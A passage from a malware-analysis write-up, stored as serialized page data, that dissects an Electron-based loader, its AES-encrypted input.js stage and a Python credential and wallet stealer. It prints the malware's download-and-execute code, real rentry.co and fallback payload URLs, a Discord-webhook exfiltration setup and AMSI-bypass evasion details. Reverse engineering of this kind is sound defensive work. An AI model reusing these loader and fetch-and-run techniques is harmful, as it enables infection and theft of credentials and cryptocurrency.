",[3724,15861,15157],{}," construct exemplifies a highly refined and evasive malware staging technique that leverages native system components, reflection, and cryptography to operate almost entirely in-memory.",[353,15864,15865],{},[433,15866,15867],{},"Key Highlights:",[367,15869,15870,15879,15885,15891],{},[370,15871,15872,15875,15876,15878],{},[433,15873,15874],{},"Bypassing AMSI",": Direct in-memory patching of ",[3724,15877,15297],{}," disables antivirus inspection without invoking detectable APIs.",[370,15880,15881,15884],{},[433,15882,15883],{},"Secure Payload Handling",": Retrieval of encrypted and compressed stage-two payloads ensures confidentiality and adds multiple layers of evasion.",[370,15886,15887,15890],{},[433,15888,15889],{},"Memory-Only Execution",": Decrypted payloads are never written to disk, making detection by traditional file-based scanners nearly impossible.",[370,15892,15893,15896],{},[433,15894,15895],{},"Modular and Reusable Architecture",": Through PowerShell parameters, SharpLoader can be flexibly reused across campaigns with varying payloads and runtime behaviors.",[13828,15898,15900,15901,15903],{"id":15899},"_5-deep-dive-mainexe-electron-based-malware-loader","5. Deep Dive: ",[3724,15902,13874],{}," – Electron-Based Malware Loader",[353,15905,9352],{},[353,15907,15908,15909,15911,15912,15915,15916,15918,15919,15921],{},"During reverse engineering, it became clear that ",[3724,15910,13874],{},", flagged by Microsoft Defender for Endpoint, was not a conventional binary but an ",[433,15913,15914],{},"Electron-based malware loader",". It was delivered inside an archive named ",[3724,15917,15090],{},", which ",[3724,15920,13870],{}," downloaded and extracted at runtime. Once unpacked, the structure and contents strongly resembled a typical Electron application.",[2548,15923,15925],{"id":15924},"_51-recognizing-electron-structure","5.1 Recognizing Electron Structure",[353,15927,10713],{},[353,15929,15930],{},"The extracted folder included files such as:",[367,15932,15933,15944,15952,15958],{},[370,15934,15935,2454,15938,2454,15941],{},[3724,15936,15937],{},"chrome_100_percent.pak",[3724,15939,15940],{},"v8_context_snapshot.bin",[3724,15942,15943],{},"d3dcompiler_47.dll",[370,15945,15946,13854,15949],{},[3724,15947,15948],{},"LICENSES.chromium",[3724,15950,15951],{},"LICENSES.electron",[370,15953,15954,15955,15957],{},"A large ",[3724,15956,13874],{}," binary (~150 MB)",[370,15959,15960,15961,15963,15964,15966,15967],{},"A ",[3724,15962,15100],{}," folder containing ",[3724,15965,14326],{}," and a secondary binary ",[3724,15968,15969],{},"elevate.exe",[353,15971,15972],{},[356,15973],{"alt":15974,"src":15975},"Packaged Windows 64-bit version of the desktop app","https://res.cloudinary.com/c4a8/image/upload/v1749796955/blog/pics/electron-app-windows-x64.png",[353,15977,15978,15979,15981],{},"These are all strong indicators of an Electron app, which uses Chromium and Node.js to package JavaScript-based desktop applications. The presence of ",[3724,15980,15969],{},", a signed Microsoft binary often used to escalate privileges, raised further suspicion—it could be abused to launch child processes with elevated rights.",[2548,15983,15985],{"id":15984},"_52-unpacking-and-static-analysis-deep-dive","5.2 Unpacking and Static Analysis (Deep Dive)",[353,15987,10713],{},[353,15989,15990,15991,15993,15994,15996,15997,15999,16000,16002,16003,16006],{},"Rather than executing ",[3724,15992,13874],{},", I opted for a static analysis approach to avoid triggering any live behavior. My initial suspicion that ",[3724,15995,13874],{}," was built with Electron was confirmed by locating the ",[3724,15998,14326],{}," file inside the ",[3724,16001,15100],{}," directory. In Electron apps, this archive contains all core application logic, such as JavaScript files, configuration (",[3724,16004,16005],{},"package.json","), and assets, packed into a custom format for performance and obfuscation purposes.",[353,16008,15859,16009,16012,16013,16016],{},[3724,16010,16011],{},".asar"," archive is essentially a read-only, high-performance container similar to ",[3724,16014,16015],{},".zip",", but optimized for Electron’s runtime. While not encrypted, it obfuscates code access, making static analysis more challenging unless unpacked.",[353,16018,16019,16020,16023],{},"To unpack it, I used the official ",[3724,16021,16022],{},"asar"," tool provided via npm. The steps were:",[3102,16025,16029],{"className":16026,"code":16027,"language":16028,"meta":402,"style":402},"language-bash shiki shiki-themes github-light github-dark","npm install -g asar\nasar extract app.asar extracted_app\n","bash",[3724,16030,16031,16048],{"__ignoreMap":402},[7258,16032,16033,16037,16041,16045],{"class":14951,"line":14952},[7258,16034,16036],{"class":16035},"sScJk","npm",[7258,16038,16040],{"class":16039},"sZZnC"," install",[7258,16042,16044],{"class":16043},"sj4cs"," -g",[7258,16046,16047],{"class":16039}," asar\n",[7258,16049,16050,16052,16055,16058],{"class":14951,"line":403},[7258,16051,16022],{"class":16035},[7258,16053,16054],{"class":16039}," extract",[7258,16056,16057],{"class":16039}," app.asar",[7258,16059,16060],{"class":16039}," extracted_app\n",[353,16062,16063,16064,16067],{},"Running the above commands extracted the content into a working folder (",[3724,16065,16066],{},"extracted_app/","), which revealed the actual JavaScript application code. This included:",[367,16069,16070,16091,16099],{},[370,16071,16072,2454,16075,2454,16078,16081,16082,16084,16085,16087,16088,16090],{},[3724,16073,16074],{},"jscryter.js",[3724,16076,16077],{},"input.js",[3724,16079,16080],{},"obf.js",": These scripts form the malware logic. ",[3724,16083,16074],{}," appears to orchestrate payload delivery, ",[3724,16086,16077],{}," defines configuration constants or command logic, and ",[3724,16089,16080],{}," is a heavily obfuscated script likely containing the core payload logic.",[370,16092,16093,2454,16095,16098],{},[3724,16094,16005],{},[3724,16096,16097],{},"package-lock.json",": Define the runtime environment",[370,16100,16101,16104,16105,2454,16108,2454,16111],{},[3724,16102,16103],{},"node_modules/",": Contains all dependencies like ",[3724,16106,16107],{},"axios",[3724,16109,16110],{},"adm-zip",[3724,16112,16113],{},"child_process",[353,16115,16116,16117,16119,16120,456],{},"The unpacked contents enabled complete visibility into the logic of the malware without requiring execution, which was essential for safe reverse engineering. This step confirmed that ",[3724,16118,13874],{}," served purely as a runtime wrapper for the malicious scripts hidden inside ",[3724,16121,14326],{},[2548,16123,16125],{"id":16124},"_53-what-the-static-analysis-revealed","5.3. What the Static Analysis Revealed",[353,16127,10713],{},[353,16129,16130],{},"By manually inspecting the code, I confirmed the malware logic was fully JavaScript-based, executed within the Electron runtime. The scripts were designed to:",[367,16132,16133,16140,16145,16148],{},[370,16134,16135,16136,16139],{},"Download an encrypted payload (",[3724,16137,16138],{},"pyth.zip",") from fallback URLs",[370,16141,16142,16143],{},"Extract the archive using ",[3724,16144,16110],{},[370,16146,16147],{},"Perform string replacement to inject specific credentials or wallet addresses",[370,16149,16150,16151,16153,16154,13854,16157],{},"Launch the resulting Python file (",[3724,16152,13878],{},") via ",[3724,16155,16156],{},"child_process.exec()",[3724,16158,13849],{},[353,16160,16161,16162,16168],{},"Crucially, the loader also included logic to ",[433,16163,16164,16165,16167],{},"copy ",[3724,16166,13870],{}," into the user's AppData directory"," if it wasn't already present—reinforcing persistence and maintaining the infection loop.",[13828,16170,16172,16173,16175],{"id":16171},"_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","6. Deep Dive: ",[3724,16174,16077],{}," – The Encrypted JavaScript Payload Loader",[353,16177,9352],{},[353,16179,16180,16182],{},[3724,16181,16077],{}," is a critical component in the analyzed malware chain, functioning as the decryption and execution hub for an encrypted JavaScript payload. This script hides its core functionality behind a strong encryption layer and only reveals its behavior during runtime.",[2548,16184,16186],{"id":16185},"_61-encryption-and-decryption-mechanics","6.1 Encryption and Decryption Mechanics",[353,16188,10713],{},[353,16190,16191,16192,16194],{},"At first glance, ",[3724,16193,16077],{}," contains very little readable code. However, its primary purpose is to decrypt and execute a large obfuscated JavaScript blob stored within the script itself.",[629,16196,16198],{"id":16197},"_611-decryption-logic","6.1.1 Decryption Logic",[353,16200,14147],{},[353,16202,16203,16204,16207],{},"The script defines a ",[3724,16205,16206],{},"decrypt()"," function that accepts four parameters:",[367,16209,16210,16216,16222,16228],{},[370,16211,16212,16215],{},[3724,16213,16214],{},"encdata",": The encrypted Base64-encoded data",[370,16217,16218,16221],{},[3724,16219,16220],{},"masterkey",": A plaintext passphrase",[370,16223,16224,16227],{},[3724,16225,16226],{},"salt",": A cryptographic salt (Base64)",[370,16229,16230,16233],{},[3724,16231,16232],{},"iv",": The initialization vector for AES decryption (Base64)",[353,16235,16236,16237,16240],{},"The decryption process is implemented using Node.js’s built-in ",[3724,16238,16239],{},"crypto"," module. It proceeds as follows:",[5026,16242,16243,16353,16466],{},[370,16244,16245,16248,16249,16327],{},[433,16246,16247],{},"Key Derivation:","\nThe script derives a 256-bit symmetric key using PBKDF2 (Password-Based Key Derivation Function 2):",[3102,16250,16254],{"className":16251,"code":16252,"language":16253,"meta":402,"style":402},"language-js shiki shiki-themes github-light github-dark","const key = crypto.pbkdf2Sync(\n  masterkey,\n  Buffer.from(salt, \"base64\"),\n  100000,\n  32,\n  \"sha512\",\n);\n","js",[3724,16255,16256,16278,16283,16300,16308,16315,16322],{"__ignoreMap":402},[7258,16257,16258,16262,16265,16268,16272,16275],{"class":14951,"line":14952},[7258,16259,16261],{"class":16260},"szBVR","const",[7258,16263,16264],{"class":16043}," key",[7258,16266,16267],{"class":16260}," =",[7258,16269,16271],{"class":16270},"sVt8B"," crypto.",[7258,16273,16274],{"class":16035},"pbkdf2Sync",[7258,16276,16277],{"class":16270},"(\n",[7258,16279,16280],{"class":14951,"line":403},[7258,16281,16282],{"class":16270},"  masterkey,\n",[7258,16284,16285,16288,16291,16294,16297],{"class":14951,"line":704},[7258,16286,16287],{"class":16270},"  Buffer.",[7258,16289,16290],{"class":16035},"from",[7258,16292,16293],{"class":16270},"(salt, ",[7258,16295,16296],{"class":16039},"\"base64\"",[7258,16298,16299],{"class":16270},"),\n",[7258,16301,16302,16305],{"class":14951,"line":15337},[7258,16303,16304],{"class":16043},"  100000",[7258,16306,16307],{"class":16270},",\n",[7258,16309,16310,16313],{"class":14951,"line":13492},[7258,16311,16312],{"class":16043},"  32",[7258,16314,16307],{"class":16270},[7258,16316,16317,16320],{"class":14951,"line":15666},[7258,16318,16319],{"class":16039},"  \"sha512\"",[7258,16321,16307],{"class":16270},[7258,16323,16324],{"class":14951,"line":13493},[7258,16325,16326],{"class":16270},");\n",[367,16328,16329,16335,16341,16347],{},[370,16330,16331,16334],{},[433,16332,16333],{},"Hash function:"," SHA-512",[370,16336,16337,16340],{},[433,16338,16339],{},"Iterations:"," 100,000",[370,16342,16343,16346],{},[433,16344,16345],{},"Key length:"," 32 bytes (256 bits)",[370,16348,16349,16352],{},[433,16350,16351],{},"Salt:"," Supplied as a Base64-decoded input",[370,16354,16355,16358,16359,16409,16411,16412],{},[433,16356,16357],{},"AES-256-CBC Decryption:","\nThe derived key is then used to create an AES decipher object:",[3102,16360,16362],{"className":16251,"code":16361,"language":16253,"meta":402,"style":402},"const decipher = crypto.createDecipheriv(\n  \"aes-256-cbc\",\n  key,\n  Buffer.from(iv, \"base64\"),\n);\n",[3724,16363,16364,16380,16387,16392,16405],{"__ignoreMap":402},[7258,16365,16366,16368,16371,16373,16375,16378],{"class":14951,"line":14952},[7258,16367,16261],{"class":16260},[7258,16369,16370],{"class":16043}," decipher",[7258,16372,16267],{"class":16260},[7258,16374,16271],{"class":16270},[7258,16376,16377],{"class":16035},"createDecipheriv",[7258,16379,16277],{"class":16270},[7258,16381,16382,16385],{"class":14951,"line":403},[7258,16383,16384],{"class":16039},"  \"aes-256-cbc\"",[7258,16386,16307],{"class":16270},[7258,16388,16389],{"class":14951,"line":704},[7258,16390,16391],{"class":16270},"  key,\n",[7258,16393,16394,16396,16398,16401,16403],{"class":14951,"line":15337},[7258,16395,16287],{"class":16270},[7258,16397,16290],{"class":16035},[7258,16399,16400],{"class":16270},"(iv, ",[7258,16402,16296],{"class":16039},[7258,16404,16299],{"class":16270},[7258,16406,16407],{"class":14951,"line":13492},[7258,16408,16326],{"class":16270},[2970,16410],{},"The encrypted payload is decrypted using standard CBC (Cipher Block Chaining) mode:",[3102,16413,16415],{"className":16251,"code":16414,"language":16253,"meta":402,"style":402},"let decrypted = decipher.update(encdata, \"base64\", \"utf8\");\ndecrypted += decipher.final(\"utf8\");\n",[3724,16416,16417,16446],{"__ignoreMap":402},[7258,16418,16419,16422,16425,16428,16431,16434,16437,16439,16441,16444],{"class":14951,"line":14952},[7258,16420,16421],{"class":16260},"let",[7258,16423,16424],{"class":16270}," decrypted ",[7258,16426,16427],{"class":16260},"=",[7258,16429,16430],{"class":16270}," decipher.",[7258,16432,16433],{"class":16035},"update",[7258,16435,16436],{"class":16270},"(encdata, ",[7258,16438,16296],{"class":16039},[7258,16440,2454],{"class":16270},[7258,16442,16443],{"class":16039},"\"utf8\"",[7258,16445,16326],{"class":16270},[7258,16447,16448,16451,16454,16456,16459,16462,16464],{"class":14951,"line":403},[7258,16449,16450],{"class":16270},"decrypted ",[7258,16452,16453],{"class":16260},"+=",[7258,16455,16430],{"class":16270},[7258,16457,16458],{"class":16035},"final",[7258,16460,16461],{"class":16270},"(",[7258,16463,16443],{"class":16039},[7258,16465,16326],{"class":16270},[370,16467,16468,16471,16472,16475,16476,16497,16499],{},[433,16469,16470],{},"Dynamic Execution:","\nThe decrypted JavaScript code is never written to disk. Instead, it is dynamically executed in memory using the ",[3724,16473,16474],{},"Function"," constructor:",[3102,16477,16479],{"className":16251,"code":16478,"language":16253,"meta":402,"style":402},"new Function(\"require\", decrypted)(require);\n",[3724,16480,16481],{"__ignoreMap":402},[7258,16482,16483,16486,16489,16491,16494],{"class":14951,"line":14952},[7258,16484,16485],{"class":16260},"new",[7258,16487,16488],{"class":16035}," Function",[7258,16490,16461],{"class":16270},[7258,16492,16493],{"class":16039},"\"require\"",[7258,16495,16496],{"class":16270},", decrypted)(require);\n",[2970,16498],{},"This technique enables fileless execution, reducing the chance of detection by traditional antivirus engines that rely on disk-based scanning.",[353,16501,16502],{},"This approach demonstrates a layered defense against reverse engineering by combining key derivation, strong encryption, and dynamic in-memory execution.",[353,16504,16505],{},[433,16506,16507],{},"Key Material and Encrypted Data",[353,16509,16510],{},"The script includes the following hardcoded inputs:",[367,16512,16513,16519,16527,16535],{},[370,16514,16515,16518],{},[433,16516,16517],{},"Encrypted Data:"," A massive Base64-encoded blob",[370,16520,16521,1501,16524],{},[433,16522,16523],{},"Master Key:",[3724,16525,16526],{},"9uNXNGt8/7kN7ZiEvy1OdYNpbcnzkERs",[370,16528,16529,1501,16531,16534],{},[433,16530,16351],{},[3724,16532,16533],{},"maXtklzMEZRY9dbul/XPSw=="," (Base64-encoded)",[370,16536,16537,1501,16540,16534],{},[433,16538,16539],{},"IV:",[3724,16541,16542],{},"HwK6sOz7FBbL+YsrOxtYUg==",[353,16544,16545,16546,456],{},"These are all embedded directly in the source code of ",[3724,16547,16077],{},[2548,16549,16551],{"id":16550},"_62-post-decryption-payload-behavior","6.2 Post-Decryption Payload Behavior",[353,16553,10713],{},[353,16555,16556],{},"Once decrypted, the embedded payload becomes a full JavaScript program that performs the following malicious actions:",[629,16558,16560],{"id":16559},"_621-environment-preparation","6.2.1 Environment Preparation",[353,16562,14147],{},[353,16564,16565],{},"The decrypted payload begins by setting up its execution environment using built-in Node.js modules. This setup phase ensures that all required paths and working directories are clearly defined before any malicious behavior occurs.",[367,16567,16568,16601],{},[370,16569,16570,16573,16574,16577,16578],{},[433,16571,16572],{},"Temporary Directory Resolution:","\nThe malware calls ",[3724,16575,16576],{},"os.tmpdir()"," to determine the path to the current system's temporary directory. This is a common tactic for malware as temporary folders are typically writable and less scrutinized by endpoint protection systems.",[3102,16579,16581],{"className":16251,"code":16580,"language":16253,"meta":402,"style":402},"const tempDir = os.tmpdir();\n",[3724,16582,16583],{"__ignoreMap":402},[7258,16584,16585,16587,16590,16592,16595,16598],{"class":14951,"line":14952},[7258,16586,16261],{"class":16260},[7258,16588,16589],{"class":16043}," tempDir",[7258,16591,16267],{"class":16260},[7258,16593,16594],{"class":16270}," os.",[7258,16596,16597],{"class":16035},"tmpdir",[7258,16599,16600],{"class":16270},"();\n",[370,16602,16603,16606,16607,16620],{},[433,16604,16605],{},"Path Construction:","\nThe script then constructs absolute paths for two important files:",[367,16608,16609,16614],{},[370,16610,16611,16613],{},[3724,16612,16138],{},": The archive that contains the actual second-stage Python-based stealer",[370,16615,16616,16619],{},[3724,16617,16618],{},"bnd.exe",": An optional executable file that may serve as a persistence backdoor or additional payload",[3102,16621,16623],{"className":16251,"code":16622,"language":16253,"meta":402,"style":402},"const tempFile = path.join(tempDir, \"pyth.zip\");\nconst binderFile = path.join(tempDir, \"bnd.exe\");\n",[3724,16624,16625,16648],{"__ignoreMap":402},[7258,16626,16627,16629,16632,16634,16637,16640,16643,16646],{"class":14951,"line":14952},[7258,16628,16261],{"class":16260},[7258,16630,16631],{"class":16043}," tempFile",[7258,16633,16267],{"class":16260},[7258,16635,16636],{"class":16270}," path.",[7258,16638,16639],{"class":16035},"join",[7258,16641,16642],{"class":16270},"(tempDir, ",[7258,16644,16645],{"class":16039},"\"pyth.zip\"",[7258,16647,16326],{"class":16270},[7258,16649,16650,16652,16655,16657,16659,16661,16663,16666],{"class":14951,"line":403},[7258,16651,16261],{"class":16260},[7258,16653,16654],{"class":16043}," binderFile",[7258,16656,16267],{"class":16260},[7258,16658,16636],{"class":16270},[7258,16660,16639],{"class":16035},[7258,16662,16642],{"class":16270},[7258,16664,16665],{"class":16039},"\"bnd.exe\"",[7258,16667,16326],{"class":16270},[353,16669,16670],{},"This path setup abstracts away OS-specific path syntax and enables the malware to operate seamlessly on any Windows system. It also sets the stage for the file download and unpacking mechanisms that follow.",[629,16672,16674],{"id":16673},"_622-payload-download-with-fallback-strategy","6.2.2 Payload Download with Fallback Strategy",[353,16676,14147],{},[353,16678,16679],{},"The second major phase of the decrypted JavaScript payload involves downloading a malicious ZIP archive from remote sources. This mechanism is designed with a multi-tiered fallback strategy to increase resilience and availability.",[367,16681,16682,16714,16799,16833],{},[370,16683,16684,16687,16688,16708,16710,16711,16713],{},[433,16685,16686],{},"Primary Link Resolution via Rentry.co","\nThe script begins by resolving a dynamic URL from a text paste service. It sends a GET request to:",[3102,16689,16691],{"className":16251,"code":16690,"language":16253,"meta":402,"style":402},"const url = \"https://rentry.co/7vzd22fg36hfdd33/raw\";\n",[3724,16692,16693],{"__ignoreMap":402},[7258,16694,16695,16697,16700,16702,16705],{"class":14951,"line":14952},[7258,16696,16261],{"class":16260},[7258,16698,16699],{"class":16043}," url",[7258,16701,16267],{"class":16260},[7258,16703,16704],{"class":16039}," \"https://rentry.co/7vzd22fg36hfdd33/raw\"",[7258,16706,16707],{"class":16270},";\n",[2970,16709],{},"This returns a plain-text URL string pointing to the actual location of the ",[3724,16712,16138],{}," archive. Using a redirection mechanism like this is a common obfuscation technique—it abstracts the real malicious URL and makes static detection harder.",[370,16715,16716,16719,16720,16752,16754,16755,16757,16758,16792,16794,16795,16798],{},[433,16717,16718],{},"Download Execution","\nThe resolved URL is then requested using the Axios library with a response stream:",[3102,16721,16723],{"className":16251,"code":16722,"language":16253,"meta":402,"style":402},"const fileResponse = await axios.get(fileUrl, { responseType: \"stream\" });\n",[3724,16724,16725],{"__ignoreMap":402},[7258,16726,16727,16729,16732,16734,16737,16740,16743,16746,16749],{"class":14951,"line":14952},[7258,16728,16261],{"class":16260},[7258,16730,16731],{"class":16043}," fileResponse",[7258,16733,16267],{"class":16260},[7258,16735,16736],{"class":16260}," await",[7258,16738,16739],{"class":16270}," axios.",[7258,16741,16742],{"class":16035},"get",[7258,16744,16745],{"class":16270},"(fileUrl, { responseType: ",[7258,16747,16748],{"class":16039},"\"stream\"",[7258,16750,16751],{"class":16270}," });\n",[2970,16753],{},"The file is written to disk as ",[3724,16756,16138],{}," in the system's temp directory:",[3102,16759,16761],{"className":16251,"code":16760,"language":16253,"meta":402,"style":402},"const writer = fs.createWriteStream(tempFile);\nfileResponse.data.pipe(writer);\n",[3724,16762,16763,16781],{"__ignoreMap":402},[7258,16764,16765,16767,16770,16772,16775,16778],{"class":14951,"line":14952},[7258,16766,16261],{"class":16260},[7258,16768,16769],{"class":16043}," writer",[7258,16771,16267],{"class":16260},[7258,16773,16774],{"class":16270}," fs.",[7258,16776,16777],{"class":16035},"createWriteStream",[7258,16779,16780],{"class":16270},"(tempFile);\n",[7258,16782,16783,16786,16789],{"class":14951,"line":403},[7258,16784,16785],{"class":16270},"fileResponse.data.",[7258,16787,16788],{"class":16035},"pipe",[7258,16790,16791],{"class":16270},"(writer);\n",[2970,16793],{},"This download is wrapped in a ",[3724,16796,16797],{},"Promise"," to ensure synchronous completion before further logic is executed.",[370,16800,16801,16804,16805,16830,16832],{},[433,16802,16803],{},"Fallback URLs","\nIf the Rentry-based link fails, the script attempts hardcoded backup locations:",[3102,16806,16808],{"className":16251,"code":16807,"language":16253,"meta":402,"style":402},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip\nhttps://cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[3724,16809,16810,16821],{"__ignoreMap":402},[7258,16811,16812,16815,16817],{"class":14951,"line":14952},[7258,16813,16814],{"class":16035},"https",[7258,16816,14452],{"class":16270},[7258,16818,16820],{"class":16819},"sJ8bj","//cosmicdust.zip/.well-known/pki-validation/pyth.zip\n",[7258,16822,16823,16825,16827],{"class":14951,"line":403},[7258,16824,16814],{"class":16035},[7258,16826,14452],{"class":16270},[7258,16828,16829],{"class":16819},"//cosmoplanets.net/well-known/pki-validation/pyth.zip\n",[2970,16831],{},"These domains are structured to appear as part of standard TLS validation folders, possibly mimicking Let's Encrypt or domain validation paths to reduce suspicion. Each fallback is retried with the same streaming and file-write logic.",[370,16834,16835,16838,16839,16842],{},[433,16836,16837],{},"Robustness and Obfuscation","\nThis fallback mechanism ensures that the malware has multiple retrieval paths for its second-stage payload. The use of a dynamic pointer (",[3724,16840,16841],{},"rentry.co",") and multiple failover mirrors makes the malware more resilient to takedowns, blocking, and DNS sinkholes.",[353,16844,16845],{},"This phase demonstrates careful operational planning by the malware authors, using layered redundancy and well-camouflaged delivery infrastructure.",[367,16847,16848,16854],{},[370,16849,16850,16851,16853],{},"Downloads ",[3724,16852,16138],{}," from the resolved URL",[370,16855,16856,16857],{},"If that fails, it attempts fallback mirrors:\n",[367,16858,16859,16864],{},[370,16860,16861],{},[3724,16862,16863],{},"https://cosmicdust.zip/.well-known/pki-validation/pyth.zip",[370,16865,16866],{},[3724,16867,16868],{},"https://cosmoplanets.net/well-known/pki-validation/pyth.zip",[629,16870,16872],{"id":16871},"_623-payload-extraction-and-manipulation","6.2.3 Payload Extraction and Manipulation",[353,16874,14147],{},[353,16876,16877,16878,16880,16881,16883],{},"Once the ",[3724,16879,16138],{}," archive has been successfully downloaded and saved to disk, the malware proceeds to extract its contents and prepare them for execution. This is accomplished using the ",[3724,16882,16110],{}," Node.js library, which allows programmatic handling of ZIP files.",[367,16885,16886,16933,16960],{},[370,16887,16888,16891,16927,16929,16930,16932],{},[433,16889,16890],{},"ZIP Extraction:",[3102,16892,16894],{"className":16251,"code":16893,"language":16253,"meta":402,"style":402},"const zip = new AdmZip(tempFile);\nzip.extractAllTo(tempDir, true);\n",[3724,16895,16896,16913],{"__ignoreMap":402},[7258,16897,16898,16900,16903,16905,16908,16911],{"class":14951,"line":14952},[7258,16899,16261],{"class":16260},[7258,16901,16902],{"class":16043}," zip",[7258,16904,16267],{"class":16260},[7258,16906,16907],{"class":16260}," new",[7258,16909,16910],{"class":16035}," AdmZip",[7258,16912,16780],{"class":16270},[7258,16914,16915,16918,16921,16923,16925],{"class":14951,"line":403},[7258,16916,16917],{"class":16270},"zip.",[7258,16919,16920],{"class":16035},"extractAllTo",[7258,16922,16642],{"class":16270},[7258,16924,7391],{"class":16043},[7258,16926,16326],{"class":16270},[2970,16928],{},"This extracts all contents of the archive to the system's temporary directory. The ",[3724,16931,7391],{}," flag ensures overwriting of any existing files.",[370,16934,16935,16938,16939,16941,16942],{},[433,16936,16937],{},"Archive Contents:","\nThe archive ",[3724,16940,16138],{}," includes a fully bundled Python project, including:",[367,16943,16944,16947,16950],{},[370,16945,16946],{},"A directory structure resembling a legitimate Python package",[370,16948,16949],{},"Several Python modules and dependencies",[370,16951,16952,16953,16955,16956,16959],{},"The key file ",[3724,16954,13878],{}," located at ",[3724,16957,16958],{},"Crypto/Util/astor.py",", which is the main stealer payload",[370,16961,16962,16965,16966,16968,16969,16989],{},[433,16963,16964],{},"Placeholder Replacement:","\nThe malware performs dynamic substitution of predefined placeholders within ",[3724,16967,13878],{}," to inject attacker-controlled configuration data such as:",[367,16970,16971,16974,16977,16983],{},[370,16972,16973],{},"A Discord webhook URL",[370,16975,16976],{},"Cryptocurrency wallet addresses (BTC, ETH, DOGE, LTC, XMR, etc.)",[370,16978,16979,16980,8133],{},"A user identifier (",[3724,16981,16982],{},"%USERID%",[370,16984,16985,16986,8133],{},"An error status flag (",[3724,16987,16988],{},"%ERRORSTATUS%",[3102,16990,16992],{"className":16251,"code":16991,"language":16253,"meta":402,"style":402},"fs.readFile(extractedDir + \"\\Crypto\\Util\\astor.py\", 'utf8', (err, data) => {\n  let updatedFile = data\n    .replace(\"%DISCORD%\", \u003Cwebhook>)\n    .replace(\"%ADDRESSBTC%\", \u003Cbtc_address>)\n    ...\n    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n\n  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n});\n",[3724,16993,16994,17054,17067,17090,17100,17105,17110,17115,17121],{"__ignoreMap":402},[7258,16995,16996,16999,17002,17005,17008,17011,17014,17017,17020,17023,17026,17029,17031,17034,17037,17041,17043,17046,17048,17051],{"class":14951,"line":14952},[7258,16997,16998],{"class":16270},"fs.",[7258,17000,17001],{"class":16035},"readFile",[7258,17003,17004],{"class":16270},"(extractedDir ",[7258,17006,17007],{"class":16260},"+",[7258,17009,17010],{"class":16039}," \"",[7258,17012,17013],{"class":16043},"\\C",[7258,17015,17016],{"class":16039},"rypto",[7258,17018,17019],{"class":16043},"\\U",[7258,17021,17022],{"class":16039},"til",[7258,17024,17025],{"class":16043},"\\a",[7258,17027,17028],{"class":16039},"stor.py\"",[7258,17030,2454],{"class":16270},[7258,17032,17033],{"class":16039},"'utf8'",[7258,17035,17036],{"class":16270},", (",[7258,17038,17040],{"class":17039},"s4XuR","err",[7258,17042,2454],{"class":16270},[7258,17044,17045],{"class":17039},"data",[7258,17047,12515],{"class":16270},[7258,17049,17050],{"class":16260},"=>",[7258,17052,17053],{"class":16270}," {\n",[7258,17055,17056,17059,17062,17064],{"class":14951,"line":403},[7258,17057,17058],{"class":16260},"  let",[7258,17060,17061],{"class":16270}," updatedFile ",[7258,17063,16427],{"class":16260},[7258,17065,17066],{"class":16270}," data\n",[7258,17068,17069,17072,17075,17077,17080,17083,17087],{"class":14951,"line":704},[7258,17070,17071],{"class":16270},"    .",[7258,17073,17074],{"class":16035},"replace",[7258,17076,16461],{"class":16270},[7258,17078,17079],{"class":16039},"\"%DISCORD%\"",[7258,17081,17082],{"class":16270},", \u003C",[7258,17084,17086],{"class":17085},"s9eBZ","webhook",[7258,17088,17089],{"class":16270},">)\n",[7258,17091,17092,17095,17098],{"class":14951,"line":15337},[7258,17093,17094],{"class":16270},"    .replace(\"%ADDRESSBTC%\", \u003C",[7258,17096,17097],{"class":16043},"btc_address",[7258,17099,17089],{"class":16270},[7258,17101,17102],{"class":14951,"line":13492},[7258,17103,17104],{"class":16270},"    ...\n",[7258,17106,17107],{"class":14951,"line":15666},[7258,17108,17109],{"class":16270},"    .replace(\"%ERRORSTATUS%\", displayError ? \"true\" : \"false\");\n",[7258,17111,17112],{"class":14951,"line":13493},[7258,17113,17114],{"emptyLinePlaceholder":415},"\n",[7258,17116,17118],{"class":14951,"line":17117},8,[7258,17119,17120],{"class":16270},"  fs.writeFile(extractedDir + \"\\Crypto\\Util\\astor.py\", updatedFile, 'utf8');\n",[7258,17122,17124],{"class":14951,"line":17123},9,[7258,17125,17126],{"class":16270},"});\n",[353,17128,17129],{},"This dynamic manipulation phase is essential. By delaying the insertion of attacker-controlled values until runtime, the payload avoids static detection and allows the operator to adapt targets and exfiltration endpoints without repackaging the archive.",[367,17131,17132],{},[370,17133,17134,17135,17137,17138],{},"Replaces placeholder strings in ",[3724,17136,13878],{},":\n",[367,17139,17140,17146,17156],{},[370,17141,17142,17143],{},"Discord webhook: ",[3724,17144,17145],{},"%DISCORD%",[370,17147,17148,17149,2454,17152,17155],{},"Wallet addresses: ",[3724,17150,17151],{},"%ADDRESSBTC%",[3724,17153,17154],{},"%ADDRESSETH%",", etc.",[370,17157,17158],{},"User ID and error flags",[629,17160,17162],{"id":17161},"_624-malware-execution","6.2.4 Malware Execution",[353,17164,14147],{},[367,17166,17167],{},[370,17168,17169,17170],{},"Once the placeholder injection into astor.py is complete, the malware initiates execution of the stealer via a system call",[3102,17171,17173],{"className":16251,"code":17172,"language":16253,"meta":402,"style":402},"exec(\"python.exe Crypto\\\\Util\\\\astor.py\");\n",[3724,17174,17175],{"__ignoreMap":402},[7258,17176,17177,17180,17182,17185,17188,17191,17193,17196],{"class":14951,"line":14952},[7258,17178,17179],{"class":16035},"exec",[7258,17181,16461],{"class":16270},[7258,17183,17184],{"class":16039},"\"python.exe Crypto",[7258,17186,17187],{"class":16043},"\\\\",[7258,17189,17190],{"class":16039},"Util",[7258,17192,17187],{"class":16043},[7258,17194,17195],{"class":16039},"astor.py\"",[7258,17197,16326],{"class":16270},[353,17199,17200],{},"This command is executed using Node.js’s child_process.exec function and launches the embedded Python payload in a separate process. This specific execution pattern—python.exe with the argument Crypto\\Util\\astor.py—was observed in telemetry data collected by Microsoft Defender for Endpoint, making it a reliable detection artifact. In practice, the execution chain looks like this:",[353,17202,17203],{},"The full malware execution chain, as observed in Microsoft Defender for Endpoint telemetry, follows this sequence:",[367,17205,17206,17214,17221,17228],{},[370,17207,17208,17210,17211],{},[3724,17209,13874],{}," (Electron-based container) invokes ",[3724,17212,17213],{},"node.exe",[370,17215,17216,17218,17219],{},[3724,17217,17213],{}," launches 